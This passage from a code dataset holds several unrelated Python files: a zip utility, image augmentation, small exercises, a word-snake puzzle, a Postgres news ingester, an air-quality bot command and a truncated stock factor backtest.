fpath + os.sep or ''\n for filename in filenames:\n z.write(os.path.join(dirpath, filename), fpath + filename)\n print('压缩成功')\n z.close()\n os.system(\"rm -rf static/download_all/*\")\n\ndef read_word(f_name):\n import docx\n doc_file = docx.Document(f_name)\n for i in range(len(doc_file.paragraphs)):\n print(\"第\" + str(i) + \"段的内容是:\" + doc_file.paragraphs[i].text)\n\nif __name__ == '__main__':\n read_word(\"requirment.docx\")\n # db = DB_Connector()\n # db.curse.execute(\"select name,date from mds_env_survey where name in ('老王')\")\n # print(db.curse.fetchall())\n # db.drop()\n # db.init_envsurvey()\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"303921767","text":"import cv2\nfrom random import random, randint\nimport numpy as np\n\n\ndef random_crop_square(image, bboxes):\n oh, ow = image.shape[:2]\n if len(bboxes) > 0:\n minx = np.min(bboxes[:, 0])\n miny = np.min(bboxes[:, 1])\n else:\n minx = ow\n miny = oh\n\n if oh > ow:\n dw = 0\n span = oh - ow\n span = min(span, miny)\n dh = randint(0, span)\n min_size = ow\n else:\n span = ow - oh\n span = min(span, minx)\n dw = randint(0, span)\n dh = 0\n min_size = oh\n return image[dh: dh + min_size, dw: dw + min_size], (dh, dw, min_size)\n\n\ndef center_is_in_img(bboxes, size):\n center = (bboxes[:, 2:] + bboxes[:, :2]) / 2\n mask = (center[:, 0] < 0) + (center[:, 1] < 0) + (center[:, 0] > size) + (center[:, 1] > size)\n return mask\n\n\ndef abandon_min_face(bboxes, min_area):\n mask = np.prod(bboxes[:, 2:] - bboxes[:, :2], -1) > min_area\n return mask\n\n\nclass CropResize:\n def __init__(self, size, crop_prob=0.5):\n self.size = size\n self.crop_prob = crop_prob\n\n def __call__(self, data):\n image = data[\"image\"]\n bboxes, conf = data[\"bboxes\"][:, :4], data[\"bboxes\"][:, 4:]\n np.random.uniform()\n oh, ow = image.shape[:2]\n hw_ratio = oh / ow\n # cv2.imshow(\"o\", image)\n if 0.8 < hw_ratio < 1.25 and random() > self.crop_prob:\n hr, wr = self.size / oh, self.size / ow\n bboxes[:, ::2] = bboxes[:, ::2] * wr\n bboxes[:, 1::2] = bboxes[:, 1::2] * hr\n image = cv2.resize(image, (self.size, self.size))\n bboxes = bboxes / 4\n else:\n image, (dh, dw, length) = random_crop_square(image, bboxes)\n bboxes[:, ::2] = bboxes[:, ::2] - dw\n bboxes[:, 1::2] = bboxes[:, 1::2] - dh\n mask = (bboxes[:, 0] > length) + (bboxes[:, 2] < 0) + \\\n (bboxes[:, 1] > length) + (bboxes[:, 3] < 0)\n # mask = center_is_in_img(bboxes, length)\n mask = ~mask\n bboxes = bboxes[mask]\n bboxes = np.clip(bboxes, 0, length)\n conf = conf[mask]\n image = cv2.resize(image, (self.size, self.size))\n ratio = self.size / length\n bboxes = bboxes * ratio / 4\n ground_truth = np.concatenate([bboxes, conf], -1)\n mask = abandon_min_face(bboxes, 25)\n\n # tmp_image = image[..., (2, 1, 0)].copy()\n # tmp_image = np.ascontiguousarray(tmp_image)\n # for box in (bboxes[mask] * 4).astype(int):\n # cv2.rectangle(tmp_image, (box[0], box[1]), (box[2], box[3]), (0, 255, 0), 1)\n # cv2.imshow(\"r\", tmp_image)\n # print(bboxes, mask, tmp_image.shape)\n # cv2.waitKey()\n\n\n data[\"image\"] = image\n data[\"bboxes\"] = ground_truth[mask]\n return data\n\n\nclass Normalization:\n def __init__(self, mean, var):\n self.mean = mean\n self.var = var\n\n def __call__(self, data):\n image = data[\"image\"]\n image = image.astype(\"float32\")\n image = image / 255.\n image[:, :] -= self.mean\n image[:, :] /= self.var\n image = image.transpose((2, 0, 1))\n data[\"image\"] = image\n return data\n","sub_path":"utils/augmentations.py","file_name":"augmentations.py","file_ext":"py","file_size_in_byte":3231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"339600417","text":"import pprint\n\npicnicItems = {'apples': 5, 'cups': 2}\nprint('I am bringing ' + str(picnicItems.get('cups', 0)) + ' cups.')\n\nspam = {'name': 'Pooka', 'age': 5}\nspam.setdefault('color', 'black')\nprint (spam)\n\nmessage = 'It was a bright cold day in April, and the clocks were striking thirteen.'\ncount = {}\ncontador = 0\nfor character in message:\n contador = contador + 1\n count.setdefault(character, 0)\n count[character] = count[character] + 1\nprint(count)\npprint.pprint(count)\nprint('NUMBER OF CHARACTER: ' + str(contador))\n","sub_path":"get-setdefault.py","file_name":"get-setdefault.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"191088014","text":"class Particle:\n def __init__(self, num, p, v, a):\n self.num = num\n self.p = p\n self.v = v\n self.a = a\n\n def getDistance(self):\n return abs(self.p[0]) + abs(self.p[1]) + abs(self.p[2])\n\n def move(self):\n for i in range(3):\n self.v[i] += self.a[i]\n self.p[i] += self.v[i]\n\ndef p2(file):\n particles = []\n for lineNum in range(len(file)):\n line = file[lineNum]\n line = line.strip().split(\", \")\n p = [int(i) for i in line[0][3:-1].split(\",\")]\n v = [int(i) for i in line[1][3:-1].split(\",\")]\n a = [int(i) for i in line[2][3:-1].split(\",\")]\n particles.append(Particle(lineNum, p, v, a))\n for i in range(100):\n [i.move() for i in particles]\n toRemove = []\n for i in particles:\n for j in particles:\n if j != i:\n if i.p == j.p:\n if i not in toRemove:\n toRemove.append(i)\n if j not in toRemove:\n toRemove.append(j)\n for i in toRemove:\n particles.remove(i)\n return len(particles)\n\ndef p1(file):\n particles = []\n for lineNum in range(len(file)):\n line = file[lineNum]\n line = line.strip().split(\", \")\n p = [int(i) for i in line[0][3:-1].split(\",\")]\n v = [int(i) for i in line[1][3:-1].split(\",\")]\n a = [int(i) for i in line[2][3:-1].split(\",\")]\n particles.append(Particle(lineNum, p, v, a))\n for i in range(1000):\n [i.move() for i in particles]\n minDistance = min([i.getDistance() for i in particles])\n minID = [i.num for i in particles if i.getDistance() == minDistance]\n return minID\n\n\nfile = list(open(\"f.txt\", \"r\"))\nprint(p2(file))","sub_path":"advent2017/a20.py","file_name":"a20.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"416944857","text":"\n\"\"\"\nWORD SNAKE CHALLENGE:\n\n Link to Challenge: http://redd.it/3bi5na\n\n Author: Kyle Bendickson, https://github.com/kbendick/\n\n My current solution is a quick prototype. To avoid the case where the\n word snake would collide with itself, the direction of the next word\n is alternated between right and down.\n\nSample Input: \"SHENANIGANS SALTY YOUNGSTER ROUND DOUBLET TERABYTE ESSENCE\"\nSample Output:\n\nSHENANIGANS\n A\n L\n T\n YOUNGSTER\n O\n U\n N\n DOUBLET\n E\n R\n A\n B\n Y\n T\n ESSENCE\n\nAs this was built was a quick prototype to an online practice problem,\nplease note that this is by no means representative of a good final solution.\nThere documented cases where the solution will fail (as well as possibly\nundocumented solutions as well). Additionally, I am likely to leave code\nin that I do not use on the off chance that it proves useful later.\n\nIf for some reason you have landed upon this repository to implement a solution\nfor your own use, feel free. I highly suggest that you don't, but what you do\nwith your work is your business.\n\"\"\"\n\n# Directions\nLEFT, RIGHT, UP, DOWN = (0, -1), (0, 1), (1, 0), (-1, 0)\nDIRECTIONS = {LEFT, RIGHT, UP, DOWN}\n\nclass WordSnakeError(Exception): pass\n\nclass WordSnake:\n\n def __init__(self, direction=RIGHT, x_offset=0, y_offset=0, words=None, x_coord=0, y_coord=0,):\n self.direction = direction\n #self.x_coord = x_coord # x_coord of current snake head\n #self.y_coord = y_coord # y_coord of current snake head\n self.x_print_offset = x_offset\n self.y_print_offset = y_offset\n self.words = (self._get_words() if not words else words.strip().upper().split())\n\n def change_direction(self):\n \"\"\" Changes the snake's direction alternating between right and down.\n \"\"\"\n self._flip_right() if self.direction == DOWN else self._flip_down()\n\n def _flip_right(self):\n self.direction = RIGHT\n\n def _flip_left(self):\n self.direction = LEFT\n\n def _flip_up(self):\n self.direction = UP\n\n def _flip_down(self):\n self.direction = DOWN\n\n def _get_words(self):\n \"\"\" Prompts the user for words to be used. Words must be separated by white space.\n \"\"\"\n return input(\"Enter words to snake: \").strip().upper().split()\n\n #### TO DO: CURRENTLY ONLY HANDLES RIGHT AND DOWN MOVEMENTS\n def format_next(self, word):\n formatted_word = ''\n\n # Truncate the last letter of all words except the last\n if word != self.words[-1]:\n word = word[:-1]\n\n # Format the word to be printed in the direction the snake is traveling\n if self.direction == RIGHT:\n formatted_word = word\n elif self.direction == DOWN:\n for char in word:\n formatted_word += char + '\\n' + ' ' * self.x_print_offset\n else:\n raise WordSnakeError(\"WordSnake.format_next - format_next is only implemented for RIGHT and DOWN.\")\n\n # Update the print offset\n self._update_print_offset_by(word)\n\n return formatted_word\n\n def _update_print_offset_by(self, previous_word):\n \"\"\" Takes in the last word printed to the word snake (with terminal\n characters removed when indicated) and updates the print offsets.\n \"\"\"\n if self.direction == RIGHT:\n self.x_print_offset += len(previous_word)\n elif self.direction == DOWN:\n self.y_print_offset += len(previous_word)\n\n def run(self):\n \"\"\" Prints the word snake to the console.\n \"\"\"\n for word in self.words:\n print(self.format_next(word), end='')\n self.change_direction()\n print()\n\n# Build/run the test suite if module is __main__\nif __name__ == '__main__':\n\n SAMPLE_INPUT_ONE = \"SHENANIGANS SALTY YOUNGSTER ROUND DOUBLET TERABYTE ESSENCE\"\n SAMPLE_INPUT_TWO = \"DELOREAN NEUTER RAMSHACKLE EAR RUMP PALINDROME EXEMPLARY YARD\"\n CHALLENGE_INPUT_ONE = \"CAN NINCOMPOOP PANTS SCRIMSHAW WASTELAND DIRK KOMBAT TEMP PLUNGE ESTER REGRET TOMBOY\"\n CHALLENGE_INPUT_TWO = \"NICKEL LEDERHOSEN NARCOTRAFFICANTE EAT TO OATS SOUP PAST TELEMARKETER RUST THINGAMAJIG GROSS SALTPETER REISSUE ELEPHANTITIS\"\n\n TEST_SUITE = [SAMPLE_INPUT_ONE, SAMPLE_INPUT_TWO, CHALLENGE_INPUT_ONE, CHALLENGE_INPUT_TWO]\n\n\n for test_words in TEST_SUITE:\n WordSnake(words=test_words).run()\n\n\n\n","sub_path":"[2015-06-29] Challenge #221 [Easy] Word snake/word_snake.py","file_name":"word_snake.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"527237539","text":"import os\nfrom datetime import datetime\nimport json\n\nimport asyncpg\n\n\nclass DatabaseConnection(object):\n def __init__(self):\n self.connection_url = os.environ.get(\"AS_POSTGRES_DSN\")\n self.pool = None\n\n async def init_models(self):\n self.pool = await asyncpg.create_pool(dsn=self.connection_url)\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"\"\"\n CREATE TABLE IF NOT EXISTS news_v2 (\n serverid varchar(8),\n news_id int,\n thumbnail varchar(16),\n title text,\n ts timestamp,\n internal_category int,\n body_html text,\n body_dm text,\n card_refs text,\n visible bool,\n PRIMARY KEY (serverid, news_id)\n );\n\n CREATE TABLE IF NOT EXISTS dt_v1 (\n serverid varchar(8),\n dt_id int,\n ts timestamp,\n next_ts timestamp,\n title text,\n body_html text,\n body_dm text,\n PRIMARY KEY (serverid, dt_id)\n );\n\n CREATE TABLE IF NOT EXISTS dt_char_refs_v1 (\n serverid varchar(8),\n dt_id int,\n char_id int,\n UNIQUE (serverid, dt_id, char_id),\n FOREIGN KEY (serverid, dt_id) REFERENCES dt_v1 (serverid, dt_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n \"\"\"\n )\n\n async def get_epoch(self, server_id):\n async with self.pool.acquire() as c:\n t = await c.fetchrow(\n \"SELECT ts FROM news_v2 WHERE serverid = $1 ORDER BY ts DESC LIMIT 1\", server_id\n )\n if not t:\n return datetime.utcfromtimestamp(0)\n return t[0]\n\n async def insert_notice(\n self, server_id, nid, title, ts, cat, thumb, body_dm, body_html, card_refs\n ):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"INSERT INTO news_v2 VALUES ($1, $2, $3, $4, $5, $6, $7, $8, $9, FALSE) ON CONFLICT DO NOTHING\",\n server_id,\n nid,\n thumb,\n title,\n ts,\n cat,\n body_html,\n body_dm,\n json.dumps(card_refs) if card_refs else None,\n )\n\n async def all_posts(self):\n async with self.pool.acquire() as c, c.transaction():\n return await c.fetch(\"SELECT serverid, news_id, body_dm FROM news_v2\")\n\n async def update_post(self, server_id, nid, body_html, card_refs):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"UPDATE news_v2 SET body_html=$1, card_refs=$2 WHERE serverid=$3 AND news_id=$4\",\n body_html,\n json.dumps(card_refs) if card_refs else None,\n server_id,\n nid,\n )\n\n async def update_visibility(self, vis_list):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"CREATE TEMPORARY TABLE vis(notice_id int, visible bool) ON COMMIT DROP\"\n )\n await c.copy_records_to_table(\"vis\", records=[(id, True) for id in vis_list])\n await c.execute(\"UPDATE news_v2 SET visible = FALSE\")\n await c.execute(\n \"UPDATE news_v2 SET visible = vis.visible FROM vis WHERE vis.notice_id = news_v2.news_id\"\n )\n\n async def all_dt(self):\n async with self.pool.acquire() as c, c.transaction():\n return await c.fetch(\"SELECT serverid, dt_id, body_dm FROM dt_v1\")\n\n async def get_dt_epoch(self, server_id):\n async with self.pool.acquire() as c:\n t = await c.fetchrow(\n \"SELECT next_ts FROM dt_v1 WHERE serverid = $1 ORDER BY next_ts DESC LIMIT 1\",\n server_id,\n )\n if not t:\n return datetime.utcfromtimestamp(0)\n return t[0]\n\n async def add_dt(self, server_id, dtid, ts, next_ts, title, body_dm, body_html, char_refs):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"INSERT INTO dt_v1 VALUES ($1, $2, $3, $4, $5, $6, $7) ON CONFLICT DO NOTHING\",\n server_id,\n dtid,\n ts,\n next_ts,\n title,\n body_html,\n body_dm,\n )\n await c.executemany(\n \"INSERT INTO dt_char_refs_v1 VALUES ($1, $2, $3) ON CONFLICT DO NOTHING\",\n ((server_id, dtid, x) for x in char_refs),\n )\n\n async def update_dt(self, server_id, dt_id, body, char_refs):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"UPDATE dt_v1 SET body_html=$1 WHERE serverid=$2 AND dt_id=$3\",\n body,\n server_id,\n dt_id,\n )\n await c.execute(\n \"DELETE FROM dt_char_refs_v1 WHERE serverid=$1 AND dt_id=$2\", server_id, dt_id\n )\n await c.executemany(\n \"INSERT INTO dt_char_refs_v1 VALUES ($1, $2, $3) ON CONFLICT DO NOTHING\",\n ((server_id, dt_id, x) for x in char_refs),\n )\n","sub_path":"maintenance/news/ingest.py","file_name":"ingest.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"637622255","text":"import json\nimport urllib.request\ntry:\n import botmodules.userlocation as user\nexcept ImportError:\n user = None\npass\n\n\ndef get_aqi(self, e):\n if user and not e.input:\n try:\n location = user.get_location_extended(self, e.nick)\n loc = \"geo:{};{}\".format(location.lat, location.lng)\n except Exception as ex:\n self.logger.exception(\"location aqi exception{}\".format(ex))\n e.output = \"No user location found\"\n return e\n elif e.input[-1] == \"!\":\n # force location by name\n loc = e.input[:-1]\n elif e.input:\n _, lat, lng, _ = user.google_geocode(self, e.input)\n loc = \"geo:{};{}\".format(lat, lng)\n\n url = \"http://api.waqi.info/feed/{}/?token={}\"\n url = url.format(loc, self.botconfig[\"APIkeys\"][\"aqicn\"])\n\n data = urllib.request.urlopen(url).read().decode()\n data = json.loads(data)\n if data['status'] != \"ok\":\n self.logger.debug(\"AQI Lookup failed:\")\n self.logger.debug(data)\n return\n data = data['data']\n \n pm25 = data['iaqi']['pm25']['v']\n\n if pm25 < 50:\n condition = \" (Good)\"\n elif pm25 < 101:\n condition = \" (Moderate)\"\n elif pm25 < 151:\n condition = \" (Unhealthy for sensitive groups)\"\n elif pm25 < 201:\n condition = \" (Unhealthy)\"\n elif pm25 < 301:\n condition = \" (Very Unhealthy)\"\n elif pm25 > 300:\n condition = \" (Hazardous)\"\n else:\n condition = \"\"\n\n city = data['city']['name']\n out = \"{} - Air Quality: PM2.5: {}{}\".format(city, pm25, condition)\n\n try:\n o3 = pm25 = data['iaqi']['o3']['v']\n out += \" Ozone: {}\".format(o3)\n except:\n pass\n\n\n e.output = out\n\n return e\n\nget_aqi.command = \"!aqi\"\n\n","sub_path":"botmodules/aqi.py","file_name":"aqi.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"588995849","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 16:42:31 2020\n\n@author: downey\n\"\"\"\n\nimport os\nimport datetime\nimport time\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import stats\nfrom pandas_datareader.famafrench import get_available_datasets\nimport pandas_datareader.data as web\n\n\n#use the performance_analysis python file to import functions\nos.chdir('PERFORMANCE_ANALYSIS LOCATION HERE')\n\nfrom performance_analysis import annualized_return\nfrom performance_analysis import annualized_standard_deviation\nfrom performance_analysis import max_drawdown\nfrom performance_analysis import gain_to_pain_ratio\nfrom performance_analysis import calmar_ratio\nfrom performance_analysis import sharpe_ratio\nfrom performance_analysis import sortino_ratio\n\npd.set_option('display.max_columns', 200)\npd.set_option('display.max_rows', 1000)\nplt.style.use('ggplot')\n#turn off pandas warning for index/slicing as copy warning\npd.options.mode.chained_assignment = None # default='warn'\n#%%\n#######################Fundamental and Equity Prices##########################\n\n#fundamental data\nfundamental_data = (\n pd.read_csv('file here')\n )\n\n#import all of the equity price data from csv from Sharadar\nequity_prices = (\n pd.read_csv('file here')\n )\n\n#get ticker meta data\ntickers_df = (\n pd.read_csv('filer here', low_memory=False)\n )\n\n#filter out companies not based in USA\ntickers_df1 = tickers_df[tickers_df['location'].notnull()]\ntickers_df1 = tickers_df1[tickers_df1['location'].str.contains(\"U.S.\")]\n\n#select needed columns to filter out sector in fundamental\ntickers_df1 = (\n tickers_df1[['ticker', 'sector', 'name',\n 'industry', 'scalemarketcap']]\n )\n\n#create set and list of all tickers\nmyset_ticker = set(tickers_df1.ticker)\nlist_tickers = list(myset_ticker)\n\n#filtered USA fundamental data\nUSA_fundamentals = fundamental_data[fundamental_data['ticker'].isin(list_tickers)]\n#%%\n\n################# Filtering the Dataset #####################\n\n\n#test_sector = 'Technology' #\n\n#### The 11 Sectors you can choose from ####\n\n#'Healthcare', 'Basic Materials', 'Financial Services',\n#'Technology', 'Industrials', 'Consumer Cyclical', 'Real Estate',\n#'Consumer Defensive', 'Communication Services', 'Energy',\n#'Utilities'\n\n#If you want to just test the sector\n#sector_stocks = tickers_df1[tickers_df1['sector'] == test_sector]\n\n#OR\n\n#If you wanted to remove Real estate and Financial Services\n#sector_stocks = tickers_df1[tickers_df1['sector'] != 'Real Estate']\n#sector_stocks = sector_stocks[sector_stocks['sector'] != 'Financial Services']\n \n#OR\n \n#To test all the market\nsector_stocks = tickers_df1\n\n#put tickers to list from sector specified\nsector_tickers = sector_stocks['ticker'].tolist()\n\n#fundamentals imported already\nfundamentals = USA_fundamentals[USA_fundamentals.ticker.isin(sector_tickers)]\n\n#Choose dimension rolling 'twelve month as reported' 'ART'. Sharadar has revisions\n#and that would be lookahead bias to use that data.\nfundamentals = fundamentals[fundamentals.dimension == 'ART']\n\n#Find data rows where fundamentals have been restated for previous quarter\n#and we want to remove for backtesting since at the time you only have the first\n#release of data and not subsequent revisions\nduplicateRowsDF = fundamentals[fundamentals.duplicated(['ticker', 'calendardate'])]\n\nprint(\"Duplicate Rows based on 2 columns are:\", duplicateRowsDF, sep='\\n')\n\nfundamentals = fundamentals.drop_duplicates(subset = ['ticker', 'calendardate'],\\\n keep = 'first')\n\nduplicateRowsDF = fundamentals[fundamentals.duplicated(['ticker', 'calendardate'])]\n\n#make sure there are no duplicates\nprint(\"Duplicate Rows based on 2 columns are:\", duplicateRowsDF, sep='\\n')\n\n#filter out companies with less than $1 billion market cap or another market cap\n#that suits your fancy\nData_for_Portfolio = fundamentals[fundamentals['marketcap'] >= 1e9]\n\n#put tickers in a list\ntickers = Data_for_Portfolio['ticker'].tolist()\nprint('There are ' + str(len(set(tickers))) + ' tickers') #number of unique tickers\n#%%\n#### Map Sector info onto the Fundamental DataFrame to use later ###\n\n#create the dictionary with values and keys as dates\nkeys = tickers_df1['ticker']\nvalues = tickers_df1['sector']\nDictionary_Sector_values = dict(zip(keys, values))\n\nData_for_Portfolio['sector'] = Data_for_Portfolio\\\n ['ticker'].map(Dictionary_Sector_values)\n#%%\n################# Creating Factor Inputs #####################\n\n### Value Factor ###\nData_for_Portfolio['E/P'] = Data_for_Portfolio['netinc'] / \\\n Data_for_Portfolio['marketcap']\nData_for_Portfolio['EBITDA/EV'] = Data_for_Portfolio['ebitda'] / \\\n Data_for_Portfolio['ev']\nData_for_Portfolio['FCF/P'] = Data_for_Portfolio['fcf'] / \\\n Data_for_Portfolio['marketcap']\n\n### Shareholder Yield ###\nData_for_Portfolio['Shareholder Yield'] = \\\n -((Data_for_Portfolio['ncfdebt'] + \\\n Data_for_Portfolio['ncfdiv'] + \\\n Data_for_Portfolio['ncfcommon']) / Data_for_Portfolio['marketcap'])\n \n###### Quality Factor - ideas taken from Alpha Architect QV model #######\n\n####Long Term Business Strength\n \n#Can you generate free cash flow\nData_for_Portfolio['FCF/Assets'] = Data_for_Portfolio['fcf'] / \\\n Data_for_Portfolio['assets']\n\n#Can you generate returns on investment \nData_for_Portfolio['ROA'] = Data_for_Portfolio['roa'] \nData_for_Portfolio['ROIC'] = Data_for_Portfolio['roic']\n\n#Do you have a defendable business model?\nData_for_Portfolio['GROSS MARGIN'] = Data_for_Portfolio['grossmargin']\n\n#Current Financial Strength\n\nData_for_Portfolio['CURRENT RATIO'] = Data_for_Portfolio['currentratio']\nData_for_Portfolio['INTEREST/EBITDA'] = Data_for_Portfolio['intexp'] / \\\n Data_for_Portfolio['ebitda'] \n#%%\n###################################################################\n\nt0 = time.time()\n\n#sort out Sector Prices\nSector_stock_prices = equity_prices.loc \\\n [equity_prices['ticker'].isin(tickers)]\n\nData_for_Portfolio = Data_for_Portfolio.dropna()\n\n#Using the same in sample dates here and for equal weight benchmark\n \nf_date = datetime.date(2012, 9, 30) \nl_date = datetime.date(2020, 9, 30) #choosing the last date, results in last\n#date for returns is l_date + 1 quarter\n\ndelta = l_date - f_date\nquarters_delta = np.floor(delta.days/(365/4))\nquarters_delta = int(quarters_delta)\nfirst_quarter = str('2012-09-30') #using f_date\nData_for_Portfolio_master = pd.DataFrame(Data_for_Portfolio)\n\n#choose if you want percentiles or fixed number of companies in long portfolio\nPercentile_split = .1\n#OR\nCompanies_in_Portfolio = 5\nWinsorize_Threshold = .025 #used to determine the winsorize level. If you are\n#only going to have a handful of companies than put the threshold really low, \n#otherwise you can use around .025 for a decile portfolio\n\nPortfolio_Turnover = pd.DataFrame()\nportfolio_returns = pd.DataFrame()\n\n#extracting and sorting the price index from the stock price df for use\n#in the for loop \nprice_index = Sector_stock_prices.set_index('date')\nprice_index = price_index.index\nprice_index = price_index.unique()\nprice_index = pd.to_datetime(price_index)\nprice_index = price_index.sort_values()\n\nfor i in range(0, quarters_delta, 4):\n\n #filter the data for only current date to look at\n Date = pd.to_datetime(first_quarter) + pd.tseries.offsets.QuarterEnd(i)\n Date = Date.strftime('%Y-%m-%d')\n Data_for_Portfolio_master_filter = Data_for_Portfolio_master.loc\\\n [Data_for_Portfolio_master['calendardate'] == Date]\n \n ###### VALUE FACTOR ######\n \n #Winsorize the metric data and compress outliers if desired\n Data_for_Portfolio_master_filter['E/P Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['E/P'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['EBITDA/EV Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['EBITDA/EV'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['FCF/P Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['FCF/P'], \\\n limits=Winsorize_Threshold)\n \n #create Z score to normalize the metrics\n Data_for_Portfolio_master_filter['E/P Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['E/P Winsorized'])\n Data_for_Portfolio_master_filter['EBITDA/EV Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['EBITDA/EV Winsorized'])\n Data_for_Portfolio_master_filter['FCF/P Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['FCF/P Winsorized'])\n \n Data_for_Portfolio_master_filter['Valuation Score'] = \\\n Data_for_Portfolio_master_filter['E/P Z score'] \\\n + Data_for_Portfolio_master_filter['EBITDA/EV Z score']\\\n + Data_for_Portfolio_master_filter['FCF/P Z score']\n \n ###### QUALITY FACTOR ###### \n \n Data_for_Portfolio_master_filter['FCF/Assets Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['FCF/Assets'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['ROA Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['ROA'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['ROIC Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['ROIC'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Gross Margin Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['GROSS MARGIN'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Current Ratio Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['CURRENT RATIO'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Interest/EBITDA Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['INTEREST/EBITDA'], \\\n limits=Winsorize_Threshold)\n \n #create Z score\n \n Data_for_Portfolio_master_filter['FCF/Assets Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['FCF/Assets Winsorized'])\n Data_for_Portfolio_master_filter['ROA Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['ROA Winsorized'])\n Data_for_Portfolio_master_filter['ROIC Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['ROIC Winsorized'])\n Data_for_Portfolio_master_filter['Gross Margin Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Gross Margin Winsorized'])\n Data_for_Portfolio_master_filter['Current Ratio Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Current Ratio Winsorized'])\n Data_for_Portfolio_master_filter['Interest/EBITDA Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Interest/EBITDA Winsorized'])\n \n Data_for_Portfolio_master_filter['Quality Score'] = \\\n Data_for_Portfolio_master_filter['FCF/Assets Z score'] \\\n + Data_for_Portfolio_master_filter['ROA Z score'] \\\n + Data_for_Portfolio_master_filter['ROIC Z score']\\\n + Data_for_Portfolio_master_filter['Gross Margin Z score']\\\n + Data_for_Portfolio_master_filter['Current Ratio Z score']\\\n - Data_for_Portfolio_master_filter['Interest/EBITDA Z score']\n\n ###### SHAREHOLDER YIELD FACTOR #####\n \n Data_for_Portfolio_master_filter['Shareholder Yield Winsorized'] = \\\n stats.mstats.winsorize(Data_for_Portfolio_master_filter['Shareholder Yield'], \\\n limits=Winsorize_Threshold)\n Data_for_Portfolio_master_filter['Shareholder Yield Z score'] = \\\n stats.zscore(Data_for_Portfolio_master_filter['Shareholder Yield Winsorized'])\n Data_for_Portfolio_master_filter['Shareholder Yield Score'] = \\\n Data_for_Portfolio_master_filter['Shareholder Yield Z score'] \n\n ###### LOW VOLATILITY FACTOR ######\n \n #must have fundamental data from previous factors for price based factors\n #as some equities have price data and no fundamental data which should not\n #be included\n Sector_stocks_Fundamental_tickers = Data_for_Portfolio_master_filter['ticker'].tolist()\n \n Sector_stock_prices_vol_df = Sector_stock_prices.loc\\\n [Sector_stock_prices['ticker'].isin(Sector_stocks_Fundamental_tickers)]\n \n Sector_stock_prices_vol_df_1 = Sector_stock_prices_vol_df.iloc[:, [0, 1, 5]]\n \n Sector_stock_prices_vol_df_1_wide = Sector_stock_prices_vol_df_1.pivot\\\n (index='date', columns='ticker', values='close')\n \n Sector_stock_prices_vol_df_1_wide = Sector_stock_prices_vol_df_1_wide.fillna(0)\n Sector_stock_returns = Sector_stock_prices_vol_df_1_wide.pct_change() \n \n #create rolling vol metric for previous 2 years\n Sector_stock_rolling_vol = Sector_stock_returns.rolling(252*2).std()\n \n #Choose second to last trading day to look at previous vol \n #Sometimes the dates are off when trying to line up end of quarter and business\n #days so to eliminate errors in the for loop I go to day of quarter, shift forward\n #a business day and then go back two business days\n Date_to_execute_trade = pd.to_datetime(Date) + pd.tseries.offsets.QuarterEnd()\n Date_to_execute_trade_plus1 = Date_to_execute_trade + pd.tseries.offsets.BusinessDay(1)\n final_trade_date = Date_to_execute_trade_plus1 - pd.tseries.offsets.BusinessDay(2)\n \n #pick the final trade date volatility for each ticker\n Filter_Date_Vol = final_trade_date.strftime('%Y-%m-%d')\n Filter_Vol_Signal = Sector_stock_rolling_vol.loc[Filter_Date_Vol]\n Filter_Vol_Signal_Sort = Filter_Vol_Signal.sort_values().dropna()\n \n #create z score and rank for the Volatility Factor\n frame = { 'Vol': 